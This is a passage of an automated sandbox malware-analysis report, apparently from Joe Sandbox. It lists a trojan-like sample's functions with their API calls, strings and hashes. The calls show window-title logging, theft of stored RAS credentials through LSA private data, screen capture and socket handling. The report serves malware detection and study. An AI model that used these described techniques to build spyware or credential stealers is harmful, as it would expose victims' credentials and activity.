API String ID: 3354934605-1591505386
Opcode ID: 069507318d07fdd3591eeedcd7f3e9026eb01116497707671abf5df464a27a46
Instruction ID: 47a45ef77663ef483bee348490e5c8beabf349d216bd41400619d6b49833efe8
Opcode Fuzzy Hash: 069507318d07fdd3591eeedcd7f3e9026eb01116497707671abf5df464a27a46
Instruction Fuzzy Hash: 662180799083119BE318DF68C89096BB3E9FBC8740F00892DF98993340D678E988CBD1

Function 10009020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000021,40000000,00000002,00000000,00000003,00000080,00000000,?,00000001), ref: 1000904C
SetFilePointer.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 1000905D
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000001), ref: 10009077
CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000907E

Strings

p, xrefs: 10009097

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID: p
API String ID: 3604237281-2181537457
Opcode ID: bcc1cd4cbb62ecbc575abc8427f350afb3af9461df4ed93e73f2b520365a0fe5
Instruction ID: e36ba735aa5967a60d40e1ff6ea43c2d8375e51feaec2a2a75f8885a5be44a60
Opcode Fuzzy Hash: bcc1cd4cbb62ecbc575abc8427f350afb3af9461df4ed93e73f2b520365a0fe5
Instruction Fuzzy Hash: CE11CE71244312ABE300DF54CC85F6BB7E9EFD9714F040A1DF6449B2D0E7B4A9098BA2

Function 1000D4A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 1000D440: RtlEnterCriticalSection.NTDLL(?), ref: 1000D448
Part of subcall function 1000D440: RtlLeaveCriticalSection.NTDLL(?), ref: 1000D462

LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D4C6
GetProcAddress.KERNEL32(00000000,closesocket), ref: 1000D4D4
FreeLibrary.KERNEL32(00000000), ref: 1000D4E6

Strings

closesocket, xrefs: 1000D4CE
ws2_32.dll, xrefs: 1000D4C1

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeLeaveLoadProc
String ID: closesocket$ws2_32.dll
API String ID: 2819327233-181964208
Opcode ID: fa73705bdcf92b9203618bcc10ca7097f6834da9e5e7f852be07f6072b9ccad8
Instruction ID: 00068fa8fe7e3d5c1250a0fa65b0051220447006da9e6c79012b2ada544fa8ed
Opcode Fuzzy Hash: fa73705bdcf92b9203618bcc10ca7097f6834da9e5e7f852be07f6072b9ccad8
Instruction Fuzzy Hash: 4FF0EC36004B21ABE210EF389C85D9F7798EFC9762F004719FB4096240CB74E905C7B6

Function 00403A7D Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 00403AD6
GetFileType.KERNEL32(00000800), ref: 00403B7C
GetStdHandle.KERNEL32(-000000F6), ref: 00403BD5
GetFileType.KERNEL32(00000000), ref: 00403BE3
SetHandleCount.KERNEL32 ref: 00403C1A

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: 77ec292723b799dc4d9b58e1807d0efb76a35c9d561ca0d753548a00766590b6
Instruction ID: 31f96ad768a7b34329c178f01d9d2c09c0530c6e7952056691baff74689cfdd4
Opcode Fuzzy Hash: 77ec292723b799dc4d9b58e1807d0efb76a35c9d561ca0d753548a00766590b6
Instruction Fuzzy Hash: 805114316046404BD7208F2CCC447667FB8FB1172AF55463AE8A6EB2E2D77CE949C719

Function 1000F260 Relevance: 7.6, APIs: 5, Instructions: 95synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F283
CloseHandle.KERNEL32(?,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F28D
??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F2B1
??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F2E2

Part of subcall function 1000FB90: LoadCursorA.USER32(00000000,00000000), ref: 1000FC53

??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F309

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ??2@$CloseCursorHandleLoadObjectSingleWait
String ID:
API String ID: 1916621575-0
Opcode ID: 1eb705cd905c0f146ef5bf02cb5afe729e58b6fb5cf2b9490db994987b313b70
Instruction ID: b70eef93bc3be5527f367b70327705cb0ffa67acdb31b1760f540c4c307e6a46
Opcode Fuzzy Hash: 1eb705cd905c0f146ef5bf02cb5afe729e58b6fb5cf2b9490db994987b313b70
Instruction Fuzzy Hash: FC31C1B0B04741ABE320DF348C52B5BBAE1EB45750F000A2CF2969BAD1DBB1E5488792

Function 100103D0 Relevance: 7.6, APIs: 5, Instructions: 91windowCOMMON

Download Yara Rule

APIs

CreateDIBSection.GDI32(10010206,?,00000000,10010206,00000000,00000000), ref: 1001042E
SelectObject.GDI32(?,00000000), ref: 1001043D
BitBlt.GDI32(?,?,?,?,?,?,?,?,?), ref: 1001045A
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1001047A
DeleteObject.GDI32(?), ref: 100104A2

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Object$CreateDeleteSectionSelect
String ID:
API String ID: 3188413882-0
Opcode ID: 6914c3d10498faa931e45aa64833eb2ce3589ba839e4f727551740e0ed738175
Instruction ID: 86756e093dbd4203ef58af1e2a4b75b8c92c1fe1a1b021b6ca6aa4606f99d77a
Opcode Fuzzy Hash: 6914c3d10498faa931e45aa64833eb2ce3589ba839e4f727551740e0ed738175
Instruction Fuzzy Hash: 7231D5B6200705AFE214CF59CC85E27F7AAFB88710F108A1DFA5587791C7B1F9408BA0

Function 100098F0 Relevance: 7.6, APIs: 5, Instructions: 71stringtimeCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?), ref: 10009906
GetWindowTextA.USER32(00000000,1007E2FC,00000400), ref: 1000991C
lstrlen.KERNEL32(1007E2FC), ref: 10009951
GetLocalTime.KERNEL32(?), ref: 10009964
wsprintfA.USER32 ref: 100099B9

Part of subcall function 100097A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100097B4
Part of subcall function 100097A0: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1000986B
Part of subcall function 100097A0: GetFileSize.KERNEL32(00000000,00000000), ref: 1000987E
Part of subcall function 100097A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10009892
Part of subcall function 100097A0: lstrlen.KERNEL32(?), ref: 100098A0
Part of subcall function 100097A0: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 100098A9

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: File$Windowlstrlen$??2@CreateDirectoryForegroundLocalPointerSizeSystemTextTimewsprintf
String ID:
API String ID: 1247169605-0
Opcode ID: 1df0067ec9095a37b7ec69bcb802230090b704360ccb88951738f67c71e14fa4
Instruction ID: 4f7ab4636ff0803a810951040c387652c581d68020769500fe1f8d2c0b4bc754
Opcode Fuzzy Hash: 1df0067ec9095a37b7ec69bcb802230090b704360ccb88951738f67c71e14fa4
Instruction Fuzzy Hash: FB21A1B12052636BE304CB18CC95A6776AAEF8C300F408A38F281D76A1D67C9D498659

Function 100113A0 Relevance: 7.6, APIs: 5, Instructions: 67sleepmemoryfileCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 100113C1
LocalAlloc.KERNEL32(00000040,?), ref: 10011403
ReadFile.KERNEL32(?,00000000,?,00000000,00000000), ref: 1001141C
Sleep.KERNEL32(00000001,00000000,00000000), ref: 10011431
LocalFree.KERNEL32(00000000), ref: 10011434

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: LocalSleep$AllocFileFreeRead
String ID:
API String ID: 175009107-0
Opcode ID: bf2ef6bc8ebea7897a9c7f3b59668ea674f0e4ecd9d9d3187eed418d19d2a9dc
Instruction ID: 73315cb63eaab40e7695a76611e533bd3f9cb332f13e7bafef01b234fadabf49
Opcode Fuzzy Hash: bf2ef6bc8ebea7897a9c7f3b59668ea674f0e4ecd9d9d3187eed418d19d2a9dc
Instruction Fuzzy Hash: 42211D71204352ABE304DF65CC85FAB77EDEB88B00F00491CB755EA284D7B0E9488B76

Function 10012A50 Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 10012A58
GetThreadDesktop.USER32(00000000), ref: 10012A5F
GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 10012A80
SetThreadDesktop.USER32(?), ref: 10012A94

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Thread$Desktop$CurrentInformationObjectUser
String ID:
API String ID: 3041254040-0
Opcode ID: 556f9f34ce626c626d025b5ad994241f14c7a72d7fb554adc5a2ad2683bfa424
Instruction ID: b6529946467a443cafd68ee4fafc1a010a5a5dac77649d55f7b29be3a82e6d96
Opcode Fuzzy Hash: 556f9f34ce626c626d025b5ad994241f14c7a72d7fb554adc5a2ad2683bfa424
Instruction Fuzzy Hash: A0F059B12003606BF3109729DCC9BEF3769EF84725F804035F640C2050FBF889C581A2

Function 1000A7C0 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 33sleepstringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1000A7E7
Sleep.KERNEL32(00000001), ref: 1000A7F2
lstrlen.KERNEL32(?,00000000), ref: 1000A802

Strings

Host, xrefs: 1000A810
SYSTEM\CurrentControlSet\Services\%s, xrefs: 1000A7E1

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Sleeplstrlenwsprintf
String ID: Host$SYSTEM\CurrentControlSet\Services\%s
API String ID: 1736695411-3973614608
Opcode ID: 8131760f708bed2bd4ce06e64e052545d9e5e77d913a46266ffcad926d35ad94
Instruction ID: 42bb8f1d3cbc34b1093e393aafb0570189901e8aeaae8089c09646219bf79e8e
Opcode Fuzzy Hash: 8131760f708bed2bd4ce06e64e052545d9e5e77d913a46266ffcad926d35ad94
Instruction Fuzzy Hash: A9F0E2B5500321BFF320AB54DC49FEB3BA9DFC4308F004818FB48A6191D2B56989C6E7

Function 10003DB0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003DDA
CancelIo.KERNEL32(?), ref: 10003DE7
InterlockedExchange.KERNEL32(?,00000000), ref: 10003DF6
closesocket.WS2_32(?), ref: 10003E03
SetEvent.KERNEL32(?), ref: 10003E10

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
String ID:
API String ID: 1486965892-0
Opcode ID: dd51bebf1240dcd95c78d2e4838092bba280de6a908707723a9b60bc76aba793
Instruction ID: 5bdee382e423177a237ef2210d66a0bf4d0f96213256af2b3b43e88352a19dbf
Opcode Fuzzy Hash: dd51bebf1240dcd95c78d2e4838092bba280de6a908707723a9b60bc76aba793
Instruction Fuzzy Hash: 86F01275204751BFE7248B70CC88F9777A9AF49711F104A1DF69A462D0CFB0A8489756

Function 10068D40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(10077218,00000000,00000001,10077188,?), ref: 10068D70

Strings

FriendlyName, xrefs: 10068E36

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID: FriendlyName
API String ID: 542301482-3623505368
Opcode ID: 376f0a869480533741e609f354106b8f4a325d2b9cf872eab34320efc47df62d
Instruction ID: afc3467e9830297f3d24d847b1d2bb17e406cd0b2032fd1a6252cdea2ef9d69a
Opcode Fuzzy Hash: 376f0a869480533741e609f354106b8f4a325d2b9cf872eab34320efc47df62d
Instruction Fuzzy Hash: 6B4118B1204341AFD610CF54CD84F5BB7E9FBC9B24F108A18B599DB290DB75E905CB62

Function 1000D0A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000D0FB
DeleteFileA.KERNEL32(?), ref: 1000D1A8

Part of subcall function 1000CF40: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000CF72
Part of subcall function 1000CF40: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 1000D029
Part of subcall function 1000CF40: GetFileSize.KERNEL32(00000000,00000000), ref: 1000D038
Part of subcall function 1000CF40: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 1000D041

Strings

XXXXXX, xrefs: 1000D107
.key, xrefs: 1000D179

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: File$DirectorySystem$??2@CreateDeleteSize
String ID: .key$XXXXXX
API String ID: 2930496114-2601115946
Opcode ID: 618e3a8066daa58dc8d3c319f89987d837cd6fe4a550a7d12166253bdad2604e
Instruction ID: 92a9d9676dfbc10a34597c778cdfdecbd90440fd8d0599ce9f46a22b4502f86a
Opcode Fuzzy Hash: 618e3a8066daa58dc8d3c319f89987d837cd6fe4a550a7d12166253bdad2604e
Instruction Fuzzy Hash: 5B310436A005085BD728DAB888527AEBB96FB84770F14036EFA27872C0DFF45D458290

Function 1000A540 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 1000A565
strrchr.MSVCRT ref: 1000A582

Strings

D, xrefs: 1000A5C9

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: mallocstrrchr
String ID: D
API String ID: 4015919094-2746444292
Opcode ID: fbf76794677e61538c32722502434da418faac4525dead3320a30888519af9fe
Instruction ID: 2b82c579dc5669429a94ef84c94f4a8368c9f4a2e82ed412c6c1b6dee6f6c207
Opcode Fuzzy Hash: fbf76794677e61538c32722502434da418faac4525dead3320a30888519af9fe
Instruction Fuzzy Hash: C5115BB62042104BE704DA28AC406AB77DAF7D5732F04053EFE46C7340DABA994EC7B2

Function 100071B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

LsaOpenPolicy.ADVAPI32(00000000,?,00000004,?), ref: 100071D2
LsaRetrievePrivateData.ADVAPI32(?,?,?), ref: 10007205

Strings

L$_RasDefaultCredentials#0, xrefs: 100071B5

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: DataOpenPolicyPrivateRetrieve
String ID: L$_RasDefaultCredentials#0
API String ID: 1655749231-2801509457
Opcode ID: 2d21782bc5c36114cb19ed2205da1e80d6db33661989c39e1f2bf4eafcba104b
Instruction ID: 93c318e700ec90dad194951c1228eb78b341e21d1d7da0fe05d388e2d6e220d4
Opcode Fuzzy Hash: 2d21782bc5c36114cb19ed2205da1e80d6db33661989c39e1f2bf4eafcba104b
Instruction Fuzzy Hash: C401D8722043026FE704DA69CC81DBBB3D9EBD4254F408D2DF544C6180EA74E949C3A2

Function 1000A620 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 1000A62C

Strings

D, xrefs: 1000A686
Ball Update, xrefs: 1000A680

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: strrchr
String ID: Ball Update$D
API String ID: 3418686817-2654422192
Opcode ID: 648673b69d33e9f8df7bed818b0523f87ebe886c01c8110b764cbfd1cf2ca8ba
Instruction ID: af045223c8d01c426d59768339580e9410ad83be0f7cb1058ad73a08f3e68785
Opcode Fuzzy Hash: 648673b69d33e9f8df7bed818b0523f87ebe886c01c8110b764cbfd1cf2ca8ba
Instruction Fuzzy Hash: 4FF049710082515BE700DB2CDC51BDB37F9EBC3765F840539FA8582250E779858E86E7

Function 00405093 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 004050B6
LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 004050CC
LCMapStringW.KERNEL32(?,?,?,00000000,oD@ ,?,?,0040446F,00200020,00000000,?,00000000), ref: 004050FF
LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 00405167
WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,oD@ ,?,00000000,00000000,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 0040518C

Strings

oD@ , xrefs: 004050F2

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID: oD@
